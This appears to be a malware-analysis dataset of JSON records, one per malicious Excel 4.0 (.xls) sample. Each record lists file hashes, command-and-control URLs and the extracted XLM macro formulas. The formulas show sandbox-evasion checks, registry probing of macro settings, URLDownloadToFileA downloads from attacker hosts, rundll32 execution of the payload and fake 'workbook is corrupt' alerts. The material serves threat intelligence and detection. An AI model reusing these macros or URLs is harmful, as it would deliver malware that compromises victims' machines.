CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b4s9dKr00g\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"96125b18605c3432669b088c4c3835cc7ce82d32319274b75b5a7e208b9c2179"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"96125b18605c3432669b088c4c3835cc7ce82d32319274b75b5a7e208b9c2179","filesize":212992,"md5":"4d180b600d2fa28dee60e1f99fcbf032","sha1":"7416780f58dbd5a838f4ab9c90b3abc793ec19b1","sha256":"96125b18605c3432669b088c4c3835cc7ce82d32319274b75b5a7e208b9c2179","sha512":"ab168051afaf77eb5322391a8c11eba05ff2d0535d70918fd31a6655bdd2dcd5b2aff76eb438459eef919b16203967d9961d9d696285346a6fa586a9446d2dba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"96125b18605c3432669b088c4c3835cc7ce82d32319274b75b5a7e208b9c2179.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yrKYXVne1n\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"96159e73e5e59b87ca4868c6aabf2fb32c000aeaa5dd96e88c50da0e5c8ace03"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"96159e73e5e59b87ca4868c6aabf2fb32c000aeaa5dd96e88c50da0e5c8ace03","filesize":185344,"md5":"5dda53ae1d4cb395687469d0e0862f69","sha1":"480e38ba31b20fb206d5e54c1f5bd751a7493635","sha256":"96159e73e5e59b87ca4868c6aabf2fb32c000aeaa5dd96e88c50da0e5c8ace03","sha512":"9d6d3928d1f0baa1f34dee4bc4e6f148b5aebd658758561bf604b001ac6991a9fa046b63b5831e1e02cd9d978a369fb2314df8f41002c139fc3ab6eb8175fbe0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"96159e73e5e59b87ca4868c6aabf2fb32c000aeaa5dd96e88c50da0e5c8ace03.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"961b236af297befe0500ea6bda701f964a4ea531192506678fee80d14ae0ad1b"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"961b236af297befe0500ea6bda701f964a4ea531192506678fee80d14ae0ad1b","filesize":185344,"md5":"d524d8b3ef34d0e43a5b6eac1a1e5d94","sha1":"5e567fe78fb9aae867f1010ab5791b84d62e903f","sha256":"961b236af297befe0500ea6bda701f964a4ea531192506678fee80d14ae0ad1b","sha512":"09412b7aa6953453c6e6326bba482a0358fb4b994effd7fffc1972618a4d2f412da6b0cf41a5eb8252b1420dba8e396892428077acd6f9f3a427cb902428c16e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"961b236af297befe0500ea6bda701f964a4ea531192506678fee80d14ae0ad1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"961c8e55031f8a683692afab2cf61504fb1e54dbf6c1e88f5dc916dfe8607aef"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"961c8e55031f8a683692afab2cf61504fb1e54dbf6c1e88f5dc916dfe8607aef","filesize":141312,"md5":"8402ac8816bc09be242b47e70fe7f3ba","sha1":"2bfc03e2afa09e092687dac1c0bc60e616802fda","sha256":"961c8e55031f8a683692afab2cf61504fb1e54dbf6c1e88f5dc916dfe8607aef","sha512":"9073cf7fbcd5ab57da0074fea06551b985501f72a59c92c215b7ab37bb684f02a03aa6bdf980d0206dbbe25741314a34cc4fde808ec539de7eb6c6e096f2ed53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"961c8e55031f8a683692afab2cf61504fb1e54dbf6c1e88f5dc916dfe8607aef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"SIi6BmwVHt\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"962da730e1fed531dfa451b8a42ecf3093a193dc1fc1b465dacf3bc68e39410c"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"962da730e1fed531dfa451b8a42ecf3093a193dc1fc1b465dacf3bc68e39410c","filesize":209920,"md5":"6f136e50ba6b88fd7823f05a5bf62e5f","sha1":"6ab2898401b857751a756b0232b673e97707754e","sha256":"962da730e1fed531dfa451b8a42ecf3093a193dc1fc1b465dacf3bc68e39410c","sha512":"ce03f7d92b44a2a4bb62651362a6a2d2eb4db7e13eb395f046663007c127f9fb4c3f2a56cb670c55404efc3c6430a2ac4d2b60d6ddbee1ea46467d8f1e50dc7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"962da730e1fed531dfa451b8a42ecf3093a193dc1fc1b465dacf3bc68e39410c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6YMSqXBiTE\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9634dad0c6d4747355891c2a99065be4126a0e47a8458e285486c9259bc42fc1"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"9634dad0c6d4747355891c2a99065be4126a0e47a8458e285486c9259bc42fc1","filesize":167936,"md5":"eae47338f4e5eb83bc29ccb03c6948f5","sha1":"0c6b48a4b43a11004ab4c92127b87aba75f604a2","sha256":"9634dad0c6d4747355891c2a99065be4126a0e47a8458e285486c9259bc42fc1","sha512":"bbe8f60277d8410831ba1022c628334f9614e6dca7e55b814a84d79aa0dc570480ed1e2a6a08fad2a04fd8605c22fdbb23afeb75e1784fd389808dc5bf48000e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9634dad0c6d4747355891c2a99065be4126a0e47a8458e285486c9259bc42fc1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"puTTqqPvRT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9657cbcee1f7579ba0132815c964863f5221179f8bf726e5e5ddac8197aee10e"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"9657cbcee1f7579ba0132815c964863f5221179f8bf726e5e5ddac8197aee10e","filesize":147968,"md5":"22ddc793339fa58a79c68e4a2150f830","sha1":"9a50999f345f4b4d2a2709f6d168fccacf51420f","sha256":"9657cbcee1f7579ba0132815c964863f5221179f8bf726e5e5ddac8197aee10e","sha512":"cd91ff2674b94baa51202a020857bc83bea53237949c4a1d2aed6b00b047f48c74c8cfad8577b740ae3d7800015878dea9a8beacc0e1e8fbc99ceb427ac91918","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9657cbcee1f7579ba0132815c964863f5221179f8bf726e5e5ddac8197aee10e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"Q14EJaui94\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"965a89cb164042770dbdddf286094e215ec1c8a7b6451ed1f97bab49cc83c2b8"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"965a89cb164042770dbdddf286094e215ec1c8a7b6451ed1f97bab49cc83c2b8","filesize":219136,"md5":"c2d0ab176c8406d58467ed4370cce229","sha1":"1be86221d124fafba7289f9b5eb862612e867677","sha256":"965a89cb164042770dbdddf286094e215ec1c8a7b6451ed1f97bab49cc83c2b8","sha512":"5506a9e138875c3f89320f20c5d813181dc6fa7a4a64039f4d7fb689a956c12a6b62a77d2c7f71168f32b8c1991160eee83fc42b18c1f9bf44648160e5c17c70","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"965a89cb164042770dbdddf286094e215ec1c8a7b6451ed1f97bab49cc83c2b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iRIGSSxERh\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"96793b3f3d35fddb0e1ecac9a1092e2f0da037d14c3e6242c4a2035b705f1d61"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"96793b3f3d35fddb0e1ecac9a1092e2f0da037d14c3e6242c4a2035b705f1d61","filesize":209920,"md5":"c94788b4c39f25f60898c788c491caf5","sha1":"f7939c84ba534ee76321f375216a3944129d3a3d","sha256":"96793b3f3d35fddb0e1ecac9a1092e2f0da037d14c3e6242c4a2035b705f1d61","sha512":"97b38dc3c9ca659a60855497a813d966792e0a5aea45f48affa2768c7a74faf176640285dd00741dc95bf4f84770841af3d33c9d2afe2686f432e65adebe63cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"96793b3f3d35fddb0e1ecac9a1092e2f0da037d14c3e6242c4a2035b705f1d61.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1LWC2dkeln\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9680c2de9c5d15ef3ef858a485ac98a67ec1cf8ce678fad79397336706004a5a"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"9680c2de9c5d15ef3ef858a485ac98a67ec1cf8ce678fad79397336706004a5a","filesize":144384,"md5":"d4356f658b2576ddbc06a14359505a21","sha1":"531f9eeeab8d7c576986f81d29aa217248cbf2c5","sha256":"9680c2de9c5d15ef3ef858a485ac98a67ec1cf8ce678fad79397336706004a5a","sha512":"335a4fc0dacc627f8b2ca3c9a078e8a21c1590a38bb79c90bf2b105c24f9aea4e4c01c91dbacc8b9aec986cce07b1816046de1d5809c5041783e207866339b7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9680c2de9c5d15ef3ef858a485ac98a67ec1cf8ce678fad79397336706004a5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ECXeZJGEeg\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9688a57ea63addf32a0a297e09776e593264b15f74a8ee510d438d2bb8c355ef"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"9688a57ea63addf32a0a297e09776e593264b15f74a8ee510d438d2bb8c355ef","filesize":209920,"md5":"b7cfe65d38d53160b9d2c01120ab8e4e","sha1":"3b04eb937cac0ee666281f5d25b903ea6b348d9d","sha256":"9688a57ea63addf32a0a297e09776e593264b15f74a8ee510d438d2bb8c355ef","sha512":"c21293e90efa95f256da118e22b8fee99949b2100bce72a8182ff361e0ef945c77cffe3554ea3dfea419dbd008842a06d82de5f416fe9a3d6ea7d5112b2c5b7c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9688a57ea63addf32a0a297e09776e593264b15f74a8ee510d438d2bb8c355ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mGxv0gNw08\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"968ed63ee91dd89eb79e263e8381ab363f2a71dfb0313a3b18541d2f49cb78de"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"968ed63ee91dd89eb79e263e8381ab363f2a71dfb0313a3b18541d2f49cb78de","filesize":160768,"md5":"20f941bf33f3f21c70ab3e671bbd51ed","sha1":"c416b6ddc321087fd1809174744ce6f99aacd855","sha256":"968ed63ee91dd89eb79e263e8381ab363f2a71dfb0313a3b18541d2f49cb78de","sha512":"bd422c6e960d730e9556fd1d6e2cb6ab49b4e5d75a017f6db427ebe3bfc413f2671b8e0704ee01b8029ba13bf627029025954e1a8b9274ae56a5ee096cc04ab6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"968ed63ee91dd89eb79e263e8381ab363f2a71dfb0313a3b18541d2f49cb78de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3L0LgpGmBE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"968f932d05019336eeb90f9e87dbac676bebaa9ffcd0d5e22b95d4820ab0a49b"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"968f932d05019336eeb90f9e87dbac676bebaa9ffcd0d5e22b95d4820ab0a49b","filesize":185344,"md5":"62eb953ec089e8d9576ff5e59e3b1883","sha1":"d4be499eacfb1001b8cc22ca1e8c4db9def7baa6","sha256":"968f932d05019336eeb90f9e87dbac676bebaa9ffcd0d5e22b95d4820ab0a49b","sha512":"8e6257c3cda57c9ea9ebcba87110f7340be7ea49f78238415cc50a9e8ffe5b47f1d4b5367306a057c0c8dd1955bdebe89e43373be829382129cba58c0cf0dd67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"968f932d05019336eeb90f9e87dbac676bebaa9ffcd0d5e22b95d4820ab0a49b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"96903c3833305bc77341176a9ae40fcdd6b746f4ea842c6786da0743dbbbfe46"},"analysis":{"reported":"2020-04-09T16:17:49Z","score":10},"files":[{"filename":"96903c3833305bc77341176a9ae40fcdd6b746f4ea842c6786da0743dbbbfe46","filesize":209920,"md5":"90070d434f5e35c1b55cd9f5e06785c9","sha1":"17cb07a3bb5a4eb05a735f255bedf6f3d33c280f","sha256":"96903c3833305bc77341176a9ae40fcdd6b746f4ea842c6786da0743dbbbfe46","sha512":"cdda81a317998602a4d3e52331506e9593b986daaca50ee69b1833a35c0bae5972ed9ca588090911b3abaf25741bb94462eff7f68f5a97aab6cfac50fde85f6d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"96903c3833305bc77341176a9ae40fcdd6b746f4ea842c6786da0743dbbbfe46.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g9xZh4i86U\",TRUE)\nGOTO(R$0C$16)"}}}]}
